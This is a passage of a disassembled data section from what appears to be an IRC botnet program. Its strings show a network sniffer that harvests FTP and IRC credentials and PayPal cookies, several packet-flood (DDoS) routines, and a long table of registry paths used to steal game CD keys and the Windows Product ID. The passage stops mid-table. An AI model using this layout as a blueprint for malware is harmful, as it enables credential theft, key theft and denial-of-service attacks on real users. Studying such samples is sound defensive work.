dword_44D7F4 dd 435249h ; DATA XREF: .data:0044CF8C�o
dword_44D7F8 dd 505446h ; DATA XREF: .data:0044CF90�o
aHttp_0 db 'HTTP',0 ; DATA XREF: .data:0044CF94�o
align 4
; char asc_44D804[]
asc_44D804 db '-' ; DATA XREF: sub_412A8E+85�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSocketFailedRe db '- socket() failed, returned %d',0
align 10h
; char asc_44D830[]
asc_44D830 db '-' ; DATA XREF: sub_412A8E+103�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
; char asc_44D85C[]
asc_44D85C db '-' ; DATA XREF: sub_412A8E+186�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 4
; char asc_44D88C[]
asc_44D88C db '-' ; DATA XREF: sub_412A8E+317�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aRecvFailedRetu db '- recv() failed, returned %d',0
align 4
; char aPsniff_0[]
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_412A8E+235�o
align 4
; char asc_44D8C4[]
asc_44D8C4 db '-' ; DATA XREF: sub_412A8E+24C�o
db 3, 34h, 2
dd 696E7370h, 3026666h, 2Dh
; char asc_44D8D4[]
asc_44D8D4 db '-' ; DATA XREF: sub_412A8E+2C6�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
; char aBotSniff[]
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412E19+5�o
align 4
; char aPsniff_1[]
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412E19+2B�o
align 10h
; char aPsniff_2[]
aPsniff_2 db 'PSNIFF//',0 ; DATA XREF: sub_412E19+3C�o
align 4
; char aJoin_1[]
aJoin_1 db 'JOIN #',0 ; DATA XREF: sub_412E19+4D�o
align 4
; char a302[]
a302 db '302 ',0 ; DATA XREF: sub_412E19:loc_412E7B�o
align 4
; char a366[]
a366 db '366 ',0 ; DATA XREF: sub_412E19+73�o
align 4
; char a_login_0[]
a_login_0 db ':.login',0 ; DATA XREF: sub_412E19+84�o
; char aLogin_0[]
aLogin_0 db ':!login',0 ; DATA XREF: sub_412E19+95�o
; char aLogin_1[]
aLogin_1 db ':!Login',0 ; DATA XREF: sub_412E19+A6�o
; char a_login_1[]
a_login_1 db ':.Login',0 ; DATA XREF: sub_412E19+B7�o
; char a_ident[]
a_ident db ':.ident',0 ; DATA XREF: sub_412E19+C8�o
; char aIdent_0[]
aIdent_0 db ':!ident',0 ; DATA XREF: sub_412E19+D9�o
; char a_hashin[]
a_hashin db ':.hashin',0 ; DATA XREF: sub_412E19+EE�o
align 10h
; char aHashin[]
aHashin db ':!hashin',0 ; DATA XREF: sub_412E19+103�o
align 4
; char aIrcSniff[]
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_412F30+5�o
align 4
; char aOper[]
aOper db 'OPER ',0 ; DATA XREF: sub_412F30+2B�o
align 10h
; char aNick_2[]
aNick_2 db 'NICK ',0 ; DATA XREF: sub_412F30:loc_412F70�o
align 4
; char aOper_0[]
aOper_0 db 'oper ',0 ; DATA XREF: sub_412F30+51�o
align 10h
; char aYouAreNowAnIrc[]
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_412F30+62�o
; char aFtpSniff[]
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_412FA6+5�o
align 4
; char aNick_3[]
aNick_3 db 'NICK ',0 ; DATA XREF: sub_412FA6+2B�o
align 10h
; char a220[]
a220 db '220 ',0 ; DATA XREF: sub_412FA6+3C�o
align 4
; char a230[]
a230 db '230 ',0 ; DATA XREF: sub_412FA6:loc_412FF7�o
align 10h
; char aUser_2[]
aUser_2 db 'USER ',0 ; DATA XREF: sub_412FA6+62�o
align 4
; char aPass_0[]
aPass_0 db 'PASS ',0 ; DATA XREF: sub_412FA6+73�o
align 10h
; char aHttpSniff[]
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_41302D+5�o
align 4
; char aPaypal[]
aPaypal db 'paypal',0 ; DATA XREF: sub_41302D+2B�o
align 4
; char aPaypal_0[]
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_41302D:loc_41306D�o
align 4
; char aPaypal_com[]
aPaypal_com db 'PAYPAL.COM',0 ; DATA XREF: sub_41302D+51�o
align 4
; char aPaypal_com_0[]
aPaypal_com_0 db 'paypal.com',0 ; DATA XREF: sub_41302D+62�o
align 4
; char aSetCookie[]
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_41302D+73�o
; char aVulnSniff[]
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_4130B4+5�o
align 4
; char aOpenssl0_9_6[]
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_4130B4+2B�o
align 4
; char aServUFtpServer[]
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_4130B4:loc_4130F4�o
align 10h
; char aOpenssh_2[]
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_4130B4+51�o
align 4
; char asc_44DA7C[]
asc_44DA7C db '-' ; DATA XREF: sub_413119+C5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 4
; char asc_44DAA8[]
asc_44DAA8 db '-' ; DATA XREF: sub_413119+14B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 4
; char aS_35[]
aS_35 db '%s',0 ; DATA XREF: sub_413119+228�o
align 4
; char aS_36[]
aS_36 db '%s',0 ; DATA XREF: sub_413119+250�o
align 10h
unk_44DAE0 db 2Dh ; - ; DATA XREF: sub_413119+2E2�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44DB14 db 2Dh ; - ; DATA XREF: sub_413119+31B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44DB48 db 2Dh ; - ; DATA XREF: sub_413119+351�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
; char asc_44DB7C[]
asc_44DB7C db '-' ; DATA XREF: sub_413119+382�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_44DBB4 db 2Dh ; - ; DATA XREF: sub_413119+3EC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
; char asc_44DBEC[]
asc_44DBEC db '-' ; DATA XREF: sub_41350C+5E�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
; char aDdos_syn_0[]
aDdos_syn_0 db 'ddos.syn',0 ; DATA XREF: sub_4135C1+F1�o
align 10h
; char aDdos_ack_0[]
aDdos_ack_0 db 'ddos.ack',0 ; DATA XREF: sub_4135C1:loc_4136D1�o
align 4
; char aDdos_random_0[]
aDdos_random_0 db 'ddos.random',0 ; DATA XREF: sub_4135C1:loc_4136ED�o
; char asc_44DC38[]
asc_44DC38 db '-' ; DATA XREF: sub_4135C1+302�o
db 3, 34h, 2
dd 736F6464h, 202D0302h, 646E6573h, 72726520h, 203A726Fh
dd 6425h
; char asc_44DC54[]
asc_44DC54 db '-' ; DATA XREF: sub_413956+49�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 10h
; char asc_44DC80[]
asc_44DC80 db '-' ; DATA XREF: sub_413956+C2�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 10h
; char asc_44DCB0[]
asc_44DCB0 db '-' ; DATA XREF: sub_413956+12A�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 10h
; char asc_44DCD0[]
asc_44DCD0 db '-' ; DATA XREF: sub_413956+307�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 4
; char asc_44DD18[]
asc_44DD18 db '-' ; DATA XREF: sub_413956+397�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
; char asc_44DD64[]
asc_44DD64 db '-' ; DATA XREF: sub_413D3D+6E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
; char asc_44DD8C[]
asc_44DD8C db '-' ; DATA XREF: sub_413D3D+13C�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 4
; char asc_44DDB8[]
asc_44DDB8 db '-' ; DATA XREF: sub_413EC9+8E�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 10h
; char asc_44DDE0[]
asc_44DDE0 db '-' ; DATA XREF: sub_413EC9+1C6�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 4
; char asc_44DE0C[]
asc_44DE0C db '-' ; DATA XREF: sub_4140DF+4B�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
; char asc_44DE38[]
asc_44DE38 db '-' ; DATA XREF: sub_414285+4B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 10h
; char asc_44DE60[]
asc_44DE60 db '-' ; DATA XREF: sub_414324+27D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 10h
; char asc_44DE80[]
asc_44DE80 db '-' ; DATA XREF: sub_414630+4F�o
db 3, 34h, 2
dd 67726174h, 3023361h
aDoneWithFlood_ db '- Done with flood.',0
align 10h
; char asc_44DEA0[]
asc_44DEA0 db '-' ; DATA XREF: sub_4148EE+70�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 4
; char asc_44DED4[]
asc_44DED4 db '-' ; DATA XREF: sub_4148EE+EE�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
; char asc_44DF0C[]
asc_44DF0C db '-' ; DATA XREF: sub_4148EE+15F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
; char aSyn_1[]
aSyn_1 db 'syn',0 ; DATA XREF: sub_4148EE+2D2�o
; char aAck_0[]
aAck_0 db 'ack',0 ; DATA XREF: sub_4148EE+2F2�o
; char aRandom_2[]
aRandom_2 db 'random',0 ; DATA XREF: sub_4148EE+312�o
align 4
; char asc_44DF3C[]
asc_44DF3C db '-' ; DATA XREF: sub_4148EE+44F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
; char asc_44DF8C[]
asc_44DF8C db '-' ; DATA XREF: sub_4148EE+4EB�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
; char asc_44DFDC[]
asc_44DFDC db '-' ; DATA XREF: sub_414E84+66�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 10h
; char aD_D_D_D_1[]
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_414F3C+C9�o
; char asc_44E01C[]
asc_44E01C db '-' ; DATA XREF: sub_415187+4D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 4
; char asc_44E05C[]
asc_44E05C db '-' ; DATA XREF: sub_4151FE+2A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 4
unk_44E088 db 2Dh ; - ; DATA XREF: sub_4151FE+63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 4
; char asc_44E0D8[]
asc_44E0D8 db '-' ; DATA XREF: sub_4151FE+80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
; char asc_44E11C[]
asc_44E11C db '-' ; DATA XREF: sub_4151FE+CC�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
; char aD_D_D_D_2[]
aD_D_D_D_2 db '%d.%d.%d.%d',0 ; DATA XREF: sub_4151FE+180�o
unk_44E154 db 2Dh ; - ; DATA XREF: sub_4151FE+345�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
; char asc_44E1E0[]
asc_44E1E0 db '-' ; DATA XREF: sub_4151FE+2F3�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
; char asc_44E244[]
asc_44E244 db '-' ; DATA XREF: sub_41554A+60�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 10h
; char asc_44E270[]
asc_44E270 db ' ',0 ; DATA XREF: sub_4156E7+1C5�o
align 4
; char aSD[]
aSD db '%s%d ',0 ; DATA XREF: sub_4156E7+207�o
align 4
dword_44E27C dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_415BFF+10�o
; char aD_[]
aD_ db '%d. ' ; DATA XREF: sub_415BFF+35�o
dd 73253403h, 203D2003h, 73253703h, 3
; char a_2d_2d4d_2d_2d[]
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_415C77+60�o
align 4
dword_44E2C8 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: .text:00415D33�o
dword_44E2D4 dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_415DB4+20�o
dword_44E2E8 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_415DB4:loc_415DE9�o
dword_44E2FC dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_415E27+3F�o
dd 676E6974h, 0
; char asc_44E318[]
asc_44E318 db '-' ; DATA XREF: sub_415E27+DC�o
db 3, 34h, 2
dd 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h, 6574656Ch
dd 0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_415F56+11�o
aWindow db 'Window',0 ; DATA XREF: sub_416191+23�o
align 4
aWindow_0 db 'Window',0 ; DATA XREF: sub_41638A+26�o
align 10h
dd 80000001h
off_44E354 dd offset aSoftwareValveC ; DATA XREF: sub_4165C9+C�r
; sub_4165C9+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey_0 ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_44E360 dd 2 dup(0) ; DATA XREF: sub_4165C9+26�o
dd 80000001h
dd offset aSoftwareEugenS ; "Software\\Eugen Systems\\The Gladiators"
dd offset aRegnumber ; "RegNumber"
dd offset aTheGladiators ; "The Gladiators"
align 10h
dd 80000001h
dd offset aSoftwareValveG ; "Software\\Valve\\Gunman\\Settings"
dd offset aKey_0 ; "Key"
dd offset aGunmanChronicl ; "Gunman Chronicles"
dd 2 dup(0)
dd 80000001h
dd offset aSoftwareValveH ; "Software\\Valve\\Half-Life\\Settings"
dd offset aKey_1 ; "Key"
dd offset aHalfLife ; "Half-Life"
align 10h
dd 80000001h
dd offset aSoftwareJowood ; "Software\\JoWooD\\InstalledGames\\IG2"
dd offset aPrvkey ; "prvkey"
dd offset aIndustryGiant2 ; "Industry Giant 2"
dd 2 dup(0)
dd 80000001h
dd offset aSoftware3d0Sta ; "Software\\3d0\\Status"
dd offset aCustomernumber ; "CustomerNumber"
dd offset aLegendsOfMight ; "Legends of Might and Magic"
align 10h
dd 80000001h
dd offset aSoftwareSilver ; "Software\\Silver Style Entertainment\\Sol"...
dd offset aCdkey_1 ; "CDKey"
dd offset aSoldiersOfAnar ; "Soldiers Of Anarchy"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareMicr_2 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd offset aProductid ; "ProductId"
dd offset aMicrosoftWindo ; "Microsoft Windows Product ID"
align 10h
dd 80000002h
dd offset aSoftwareUnreal ; "Software\\Unreal Technology\\Installed Ap"...
dd offset aCdkey_2 ; "CDKey"
dd offset aUnrealTourname ; "Unreal Tournament 2003"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareUnre_0 ; "Software\\Unreal Technology\\Installed Ap"...
dd offset aCdkey_3 ; "CDKey"
dd offset aUnrealTourna_0 ; "Unreal Tournament 2004"
align 10h
dd 80000002h
dd offset aSoftwareIgi2Re ; "Software\\IGI 2 Retail"
dd offset aCdkey_4 ; "CDKey"
dd offset aIgi2CovertStri ; "IGI 2: Covert Strike"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElectr ; "Software\\Electronic Arts\\EA Distributio"...
dd offset dword_4EBEA0
dd offset aFreedomForce ; "Freedom Force"
align 10h
dd 80000002h
dd offset aSoftwareElec_0 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EBEA4
dd offset aBattlefield194 ; "Battlefield 1942"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_1 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EBEA8
dd offset aBattlefield1_0 ; "Battlefield 1942 (Road To Rome)"
align 10h
dd 80000002h
dd offset aSoftwareElec_2 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EBEAC
dd offset aBattlefield1_1 ; "Battlefield 1942 (Secret Weapons of WWI"...
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_3 ; "Software\\Electronic Arts\\EA GAMES\\Battl"...
dd offset dword_4EBEB0
dd offset aBattlefieldVie ; "Battlefield Vietnam"
align 10h
dd 80000002h
dd offset aSoftwareElec_4 ; "Software\\Electronic Arts\\EA GAMES\\Black"...
dd offset dword_4EBEB4
dd offset aBlackAndWhite ; "Black and White"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_5 ; "Software\\Electronic Arts\\EA GAMES\\Comma"...
dd offset dword_4EBEB8
dd offset aCommandAndConq ; "Command and Conquer: Generals (Zero Hou"...
align 10h
dd 80000002h
dd offset aSoftwareElec_6 ; "Software\\Electronic Arts\\EA GAMES\\James"...
dd offset dword_4EBEBC
dd offset aJamesBond007Ni ; "James Bond 007: Nightfire"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_7 ; "Software\\Electronic Arts\\EA GAMES\\Gener"...
dd offset dword_4EBEC0
dd offset aCommandAndCo_0 ; "Command and Conquer: Generals"
align 10h
dd 80000002h
dd offset aSoftwareElec_8 ; "Software\\Electronic Arts\\EA GAMES\\Globa"...
dd offset dword_4EBEC4
dd offset aGlobalOperatio ; "Global Operations"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareElec_9 ; "Software\\Electronic Arts\\EA GAMES\\Medal"...
dd offset dword_4EBEC8
dd offset aMedalOfHonorAl ; "Medal of Honor: Allied Assault"
align 10h
dd 80000002h
dd offset aSoftwareEle_10 ; "Software\\Electronic Arts\\EA GAMES\\Medal"...
dd offset dword_4EBECC
dd offset aMedalOfHonor_0 ; "Medal of Honor: Allied Assault: Breakth"...
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_11 ; "Software\\Electronic Arts\\EA GAMES\\Medal"...
dd offset dword_4EBED0
dd offset aMedalOfHonor_1 ; "Medal of Honor: Allied Assault: Spearhe"...
align 10h
dd 80000002h
dd offset aSoftwareEle_12 ; "Software\\Electronic Arts\\EA GAMES\\Need "...
dd offset aErgc ; "ergc"
dd offset aNeedForSpeedHo ; "Need For Speed Hot Pursuit 2"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_13 ; "Software\\Electronic Arts\\EA GAMES\\Need "...
dd offset dword_4EBED4
dd offset aNeedForSpeedUn ; "Need For Speed: Underground"
align 10h
dd 80000002h
dd offset aSoftwareEle_14 ; "Software\\Electronic Arts\\EA GAMES\\Shogu"...
dd offset dword_4EBED8
dd offset aShogunTotalWar ; "Shogun: Total War: Warlord Edition"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_15 ; "Software\\Electronic Arts\\EA Sports\\FIFA"...
dd offset dword_4EBEDC
dd offset aFifa2002 ; "FIFA 2002"
align 10h
dd 80000002h
dd offset aSoftwareEle_16 ; "Software\\Electronic Arts\\EA Sports\\FIFA"...
dd offset dword_4EBEE0
dd offset aFifa2003 ; "FIFA 2003"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_17 ; "Software\\Electronic Arts\\EA Sports\\NHL "...
dd offset dword_4EBEE4
dd offset aNhl2002 ; "NHL 2002"
align 10h
dd 80000002h
dd offset aSoftwareEle_18 ; "Software\\Electronic Arts\\EA Sports\\NHL "...
dd offset dword_4EBEE8
dd offset aNhl2003 ; "NHL 2003"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareEle_19 ; "Software\\Electronic Arts\\EA Sports\\Nasc"...
dd offset dword_4EBEEC
dd offset aNascarRacing20 ; "Nascar Racing 2002"
align 10h
dd 80000002h
dd offset aSoftwareEle_20 ; "Software\\Electronic Arts\\EA Sports\\Nasc"...
dd offset dword_4EBEF0
dd offset aNascarRacing_0 ; "Nascar Racing 2003"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareRedSto ; "Software\\Red Storm Entertainment\\RAVENS"...
dd offset aCdkey_5 ; "CDKey"
dd offset aRainbowSixIiiR ; "Rainbow Six III RavenShield"
align 10h
dd 80000002h
dd offset aSoftwareWestwo ; "Software\\Westwood\\Tiberian Sun"
dd offset aSerial ; "Serial"
dd offset aCommandAndCo_1 ; "Command and Conquer: Tiberian Sun"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareWest_0 ; "Software\\Westwood\\Red Alert"
dd offset aSerial_0 ; "Serial"
dd offset aCommandAndCo_2 ; "Command and Conquer: Red Alert"
align 10h
dd 80000002h
dd offset aSoftwareWest_1 ; "Software\\Westwood\\Red Alert 2"
dd offset aSerial_1 ; "Serial"
dd offset aCommandAndCo_3 ; "Command and Conquer: Red Alert 2"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareWest_2 ; "Software\\Westwood\\NOX"
dd offset aSerial_2 ; "Serial"
dd offset aNox ; "NOX"
align 10h
dd 80000002h
dd offset aSoftwareTechla ; "Software\\Techland\\Chrome"
dd offset aSerialnumber ; "SerialNumber"
dd offset aChrome ; "Chrome"
dd 2 dup(0)
dd 80000002h
dd offset aSoftwareIllusi ; "Software\\Illusion Softworks\\Hidden & Da"...
dd offset aKey_2 ; "key"
dd offset aHiddenDangerou ; "Hidden & Dangerous 2"
align 10h
dd 80000002h
dd offset aSoftwareActivi ; "Software\\Activision\\Soldier of Fortune "...
dd offset aInstallpath ; "InstallPath"
dd offset aSoldierOfFortu ; "Soldier of Fortune II - Double Helix"
dd offset aBaseMpSof2key ; "base\\mp\\sof2key"
dd offset aMtkwftmkemfew3 ; "mtkwftmkemfew3p3b7"
dd 80000002h
dd offset aSoftwareBiowar ; "Software\\BioWare\\NWN\\Neverwinter"
dd offset aLocation ; "Location"
dd offset aNeverwinterNig ; "Neverwinter Nights"
dd offset aNwncdkey_ini ; "nwncdkey.ini"
dd offset aKey1 ; "Key1="
dd 80000002h
dd offset aSoftwareBiow_0 ; "Software\\BioWare\\NWN\\Neverwinter"
dd offset aLocation_0 ; "Location"
dd offset aNeverwinterN_0 ; "Neverwinter Nights (Shadows of Undrenti"...
dd offset aNwncdkey_ini_0 ; "nwncdkey.ini"
dd offset aKey2 ; "Key2="
dd 80000002h
dd offset aSoftwareBiow_1 ; "Software\\BioWare\\NWN\\Neverwinter"
dd offset aLocation_1 ; "Location"
dd offset aNeverwinterN_1 ; "Neverwinter Nights (Hordes of the Under"...
dd offset aNwncdkey_ini_1 ; "nwncdkey.ini"
dd offset aKey3 ; "Key3="
dd 6 dup(0)
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: .data:off_44E354�o
align 10h
aCdkey_0 db 'CDKey',0 ; DATA XREF: .data:0044E358�o
align 4
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: .data:0044E35C�o
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0 ; DATA XREF: .data:0044E36C�o
align 4
aRegnumber db 'RegNumber',0 ; DATA XREF: .data:0044E370�o
align 4
aTheGladiators db 'The Gladiators',0 ; DATA XREF: .data:0044E374�o
align 4
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0 ; DATA XREF: .data:0044E384�o
align 4
aKey_0 db 'Key',0 ; DATA XREF: .data:0044E388�o
aGunmanChronicl db 'Gunman Chronicles',0 ; DATA XREF: .data:0044E38C�o
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0 ; DATA XREF: .data:0044E39C�o
align 10h
aKey_1 db 'Key',0 ; DATA XREF: .data:0044E3A0�o
aHalfLife db 'Half-Life',0 ; DATA XREF: .data:0044E3A4�o
align 10h
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0 ; DATA XREF: .data:0044E3B4�o
align 4
aPrvkey db 'prvkey',0 ; DATA XREF: .data:0044E3B8�o
align 4
aIndustryGiant2 db 'Industry Giant 2',0 ; DATA XREF: .data:0044E3BC�o
align 10h
aSoftware3d0Sta db 'Software\3d0\Status',0 ; DATA XREF: .data:0044E3CC�o
aCustomernumber db 'CustomerNumber',0 ; DATA XREF: .data:0044E3D0�o
align 4
aLegendsOfMight db 'Legends of Might and Magic',0 ; DATA XREF: .data:0044E3D4�o
align 10h
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
; DATA XREF: .data:0044E3E4�o
align 4
aCdkey_1 db 'CDKey',0 ; DATA XREF: .data:0044E3E8�o
align 4
aSoldiersOfAnar db 'Soldiers Of Anarchy',0 ; DATA XREF: .data:0044E3EC�o
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion',0
; DATA XREF: .data:0044E3FC�o
align 4
aProductid db 'ProductId',0 ; DATA XREF: .data:0044E400�o
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0 ; DATA XREF: .data:0044E404�o
align 4
aSoftwareUnreal db 'Software\Unreal Technology\Installed Apps\UT2003',0
; DATA XREF: .data:0044E414�o
align 4
aCdkey_2 db 'CDKey',0 ; DATA XREF: .data:0044E418�o
align 4
aUnrealTourname db 'Unreal Tournament 2003',0 ; DATA XREF: .data:0044E41C�o
align 4
aSoftwareUnre_0 db 'Software\Unreal Technology\Installed Apps\UT2004',0
